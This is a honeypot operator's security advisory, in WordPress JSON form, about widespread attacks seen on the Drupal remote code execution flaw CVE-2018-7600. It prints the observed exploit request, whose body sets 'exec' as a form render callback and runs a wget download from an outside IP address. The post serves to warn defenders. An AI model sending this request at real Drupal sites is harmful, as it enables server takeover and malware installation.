{"id":570,"date":"2018-04-01T09:32:40","date_gmt":"2018-04-01T09:32:40","guid":{"rendered":"http:\/\/www.cloudcoffer.com\/?p=570"},"modified":"2018-04-17T09:36:58","modified_gmt":"2018-04-17T09:36:58","slug":"widespread-drupal-arbitrary-code-execution","status":"publish","type":"post","link":"https:\/\/www.cloudcoffer.com\/?p=570","title":{"rendered":"Widespread Drupal Arbitrary Code Execution"},"content":{"rendered":"<p><strong>Date of Detection:<\/strong><\/p>\n<p>2018.3.29<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Attack Pattern:<\/strong><\/p>\n<ul>\n<li><span style=\"color: #000000;\">URI:<\/span><\/li>\n<\/ul>\n<p>\/user\/register?element_parents=account\/mail\/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><span style=\"color: #000000;\">Request Body:<\/span><\/li>\n<\/ul>\n<p>form_id=user_register_form&amp;_drupal_ajax=1&amp;mail%5B%23post_render%5D%5B%5D=exec&amp;<\/p>\n<p>mail%5B%23type%5D=markup&amp;mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Target System:<\/strong><\/p>\n<p>Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Analysis:<\/strong><\/p>\n<p>This issue is not a zero-day vulnerability; it has been assigned CVE-2018-7600. However, attackers are scanning and attacking a large portion of CloudCoffer's worldwide honeypots. 
That means any system that has not been updated is at risk.<\/p>\n<p>Please note that the payload carried in the request body differs from request to request.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Date of Detection: 2018.3.29 &nbsp; Attack Pattern: URI: \/user\/register?element_parents=account\/mail\/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax &nbsp; Request Body: form_id=user_register_form&amp;_drupal_ajax=1&amp;mail%5B%23post_render%5D%5B%5D=exec&amp; mail%5B%23type%5D=markup&amp;mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php &nbsp; Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code. &nbsp; Analysis: This issue is not a zero-day vulnerability; it has been assigned CVE-2018-7600. However, attackers are scanning and <a href=\"https:\/\/www.cloudcoffer.com\/?p=570\" rel=\"nofollow\"><span class=\"sr-only\">Read more about Widespread Drupal Arbitrary Code 
Execution<\/span>[&hellip;]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-570","post","type-post","status-publish","format-standard","hentry","category-honeypot"],"_links":{"self":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=570"}],"version-history":[{"count":5,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570\/revisions"}],"predecessor-version":[{"id":575,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570\/revisions\/575"}],"wp:attachment":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}